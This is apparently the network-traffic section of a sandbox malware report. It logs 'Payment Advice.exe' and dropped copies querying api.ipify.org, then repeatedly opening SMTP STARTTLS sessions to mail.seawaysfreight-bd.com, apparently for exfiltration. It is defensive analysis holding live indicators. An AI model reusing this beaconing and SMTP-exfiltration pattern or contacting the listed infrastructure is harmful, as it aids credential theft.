                                                                                    Apr 18, 2024 18:30:16.301173925 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.369404078 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:16.369504929 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.488217115 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:16.489676952 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.647945881 CEST5874977694.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:16.648221016 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.854810953 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:16.855081081 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.973860025 CEST5874977694.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:16.974139929 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.974190950 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.974220991 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.974523067 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:16.975481987 CEST49776587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:17.200994968 CEST5874977594.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:17.201183081 CEST49775587192.168.2.494.100.26.91
                                                                                    Apr 18, 2024 18:30:17.299638987 CEST5874977694.100.26.91192.168.2.4
                                                                                    Apr 18, 2024 18:30:17.299694061 CEST5874977694.100.26.91192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 18:26:01.840276957 CEST | 57377 | 53 | 192.168.2.4 | 1.1.1.1
Apr 18, 2024 18:26:01.944864035 CEST | 53 | 57377 | 1.1.1.1 | 192.168.2.4
Apr 18, 2024 18:26:03.248054981 CEST | 52350 | 53 | 192.168.2.4 | 1.1.1.1
Apr 18, 2024 18:26:04.091023922 CEST | 53 | 52350 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 18, 2024 18:26:01.840276957 CEST | 192.168.2.4 | 1.1.1.1 | 0x7fa5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 18, 2024 18:26:03.248054981 CEST | 192.168.2.4 | 1.1.1.1 | 0xbbe6 | Standard query (0) | mail.seawaysfreight-bd.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 18, 2024 18:26:01.944864035 CEST | 1.1.1.1 | 192.168.2.4 | 0x7fa5 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 18:26:01.944864035 CEST | 1.1.1.1 | 192.168.2.4 | 0x7fa5 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 18:26:01.944864035 CEST | 1.1.1.1 | 192.168.2.4 | 0x7fa5 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 18:26:04.091023922 CEST | 1.1.1.1 | 192.168.2.4 | 0xbbe6 | No error (0) | mail.seawaysfreight-bd.com | seawaysfreight-bd.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 18:26:04.091023922 CEST | 1.1.1.1 | 192.168.2.4 | 0xbbe6 | No error (0) | seawaysfreight-bd.com | | 94.100.26.91 | A (IP address) | IN (0x0001) | false
                                                                                    • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 104.26.13.205 | 443 | 7404 | C:\Users\user\Desktop\Payment Advice.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-18 16:26:02 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-18 16:26:02 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Apr 2024 16:26:02 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 876603a4ece1b0c4-ATL
2024-04-18 16:26:02 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 104.26.13.205 | 443 | 7816 | C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-18 16:26:06 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-18 16:26:06 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Apr 2024 16:26:06 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 876603c0dbcf44e7-ATL
2024-04-18 16:26:06 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 104.26.13.205 | 443 | 6576 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-18 16:26:16 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-18 16:26:16 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Apr 2024 16:26:16 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 876603fa8b556779-ATL
2024-04-18 16:26:16 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49750 | 104.26.13.205 | 443 | 4092 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 16:26:23 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-04-18 16:26:24 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Thu, 18 Apr 2024 16:26:24 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8766042cca6617fb-ATL
2024-04-18 16:26:24 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
Data Ascii: 81.181.57.52


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 18, 2024 18:26:05.086004019 CEST | 587 | 49738 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:04 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:26:05.086210012 CEST | 49738 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:26:05.503406048 CEST | 587 | 49738 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:26:05.504209995 CEST | 49738 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:26:05.918344975 CEST | 587 | 49738 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:26:08.595472097 CEST | 587 | 49740 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:08 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:26:08.607039928 CEST | 49740 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:26:09.024373055 CEST | 587 | 49740 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:26:09.024564028 CEST | 49740 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:26:09.440186024 CEST | 587 | 49740 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:26:17.751367092 CEST | 587 | 49747 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:17 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:26:17.751595974 CEST | 49747 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:26:18.204749107 CEST | 587 | 49747 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:26:18.204906940 CEST | 49747 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:26:18.687135935 CEST | 587 | 49747 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:26:25.561213017 CEST | 587 | 49751 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:26:25 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:26:25.561459064 CEST | 49751 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:26:25.960481882 CEST | 587 | 49751 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:26:25.960668087 CEST | 49751 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:26:26.370327950 CEST | 587 | 49751 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:27:33.116924047 CEST | 587 | 49753 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:27:32 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:27:33.117080927 CEST | 49753 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:27:33.419749022 CEST | 587 | 49754 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:27:33 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:27:33.419884920 CEST | 49754 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:27:33.454719067 CEST | 587 | 49753 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:27:33.455034971 CEST | 49753 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:27:33.736985922 CEST | 587 | 49754 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:27:33.737164974 CEST | 49754 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:27:33.791444063 CEST | 587 | 49753 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:27:34.055052996 CEST | 587 | 49754 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:08.661825895 CEST | 587 | 49755 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:08 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:08.662033081 CEST | 49755 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:09.082036018 CEST | 587 | 49755 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:09.082175016 CEST | 49755 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:09.491904020 CEST | 587 | 49755 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:10.422605038 CEST | 587 | 49756 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:10 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:10.661952972 CEST | 587 | 49756 | 94.100.26.91 | 192.168.2.4 | 421 daud.aptcom.info lost input connection
Apr 18, 2024 18:28:11.191382885 CEST | 587 | 49757 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:11 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:11.191529989 CEST | 49757 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:11.615143061 CEST | 587 | 49757 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:11.615398884 CEST | 49757 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:12.033521891 CEST | 587 | 49757 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:13.039503098 CEST | 587 | 49758 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:12 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:13.039908886 CEST | 49758 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:13.450272083 CEST | 587 | 49758 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:13.450408936 CEST | 49758 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:13.843822956 CEST | 587 | 49758 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:23.357388973 CEST | 587 | 49759 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:23 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:23.357575893 CEST | 49759 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:23.674895048 CEST | 587 | 49759 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:23.675051928 CEST | 49759 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:23.993309021 CEST | 587 | 49759 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:37.372211933 CEST | 587 | 49760 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:37 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:37.372344017 CEST | 49760 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:37.719393969 CEST | 587 | 49760 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:37.719537020 CEST | 49760 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:38.066613913 CEST | 587 | 49760 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:41.265181065 CEST | 587 | 49761 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:41 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:41.265366077 CEST | 49761 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:41.613657951 CEST | 587 | 49761 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:41.613814116 CEST | 49761 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:41.970258951 CEST | 587 | 49761 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:43.405625105 CEST | 587 | 49762 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:43 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:43.405797005 CEST | 49762 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:43.754708052 CEST | 587 | 49762 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:43.754901886 CEST | 49762 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:44.532633066 CEST | 49762 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:44.657258034 CEST | 587 | 49762 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:44.887641907 CEST | 587 | 49762 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:49.258838892 CEST | 587 | 49763 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:49 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:49.259047031 CEST | 49763 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:49.601460934 CEST | 587 | 49763 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:49.601843119 CEST | 49763 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:49.956204891 CEST | 587 | 49763 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:28:50.824878931 CEST | 587 | 49762 | 94.100.26.91 | 192.168.2.4 | 421 Lost incoming connection
Apr 18, 2024 18:28:56.187978029 CEST | 587 | 49764 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:28:56 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:28:56.188179970 CEST | 49764 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:28:56.505361080 CEST | 587 | 49764 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:28:56.506412029 CEST | 49764 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:28:56.825459957 CEST | 587 | 49764 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:29:01.792551994 CEST | 587 | 49765 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:01 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:29:01.792695045 CEST | 49765 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:29:02.154078007 CEST | 587 | 49765 | 94.100.26.91 | 192.168.2.4 | 250-daud.aptcom.info Hello 642294 [81.181.57.52]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Apr 18, 2024 18:29:02.154392004 CEST | 49765 | 587 | 192.168.2.4 | 94.100.26.91 | STARTTLS
Apr 18, 2024 18:29:02.501596928 CEST | 587 | 49765 | 94.100.26.91 | 192.168.2.4 | 220 TLS go ahead
Apr 18, 2024 18:29:10.030574083 CEST | 587 | 49766 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:09 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:29:10.030719995 CEST | 49766 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
Apr 18, 2024 18:29:10.106517076 CEST | 587 | 49767 | 94.100.26.91 | 192.168.2.4 | 220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:09 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Apr 18, 2024 18:29:10.106657982 CEST | 49767 | 587 | 192.168.2.4 | 94.100.26.91 | EHLO 642294
                                                                                    Apr 18, 2024 18:29:10.383198977 CEST5874976694.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:10.384572983 CEST49766587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:10.424048901 CEST5874976794.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:10.424216986 CEST49767587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:10.732556105 CEST5874976694.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:10.742633104 CEST5874976794.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:17.009036064 CEST5874976894.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:16 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:17.010613918 CEST49768587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:17.184669971 CEST5874976994.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:17 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:17.184940100 CEST49769587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:17.362822056 CEST5874976894.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:17.363009930 CEST49768587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:17.416994095 CEST5874976594.100.26.91192.168.2.4421 Lost incoming connection
                                                                                    Apr 18, 2024 18:29:17.610515118 CEST5874976994.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:17.610750914 CEST49769587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:17.713443041 CEST5874976894.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:18.026046991 CEST5874976994.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:25.639596939 CEST5874977094.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:25 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:25.639875889 CEST49770587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:25.991235018 CEST5874977094.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:25.991441965 CEST49770587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:26.345534086 CEST5874977094.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:33.801326036 CEST5874977194.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:33 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:33.801469088 CEST49771587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:34.048618078 CEST5874977094.100.26.91192.168.2.4421 Lost incoming connection
                                                                                    Apr 18, 2024 18:29:34.137705088 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:34.137900114 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:34.874681950 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:35.089317083 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:35.874480963 CEST49771587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:36.177504063 CEST5874977194.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
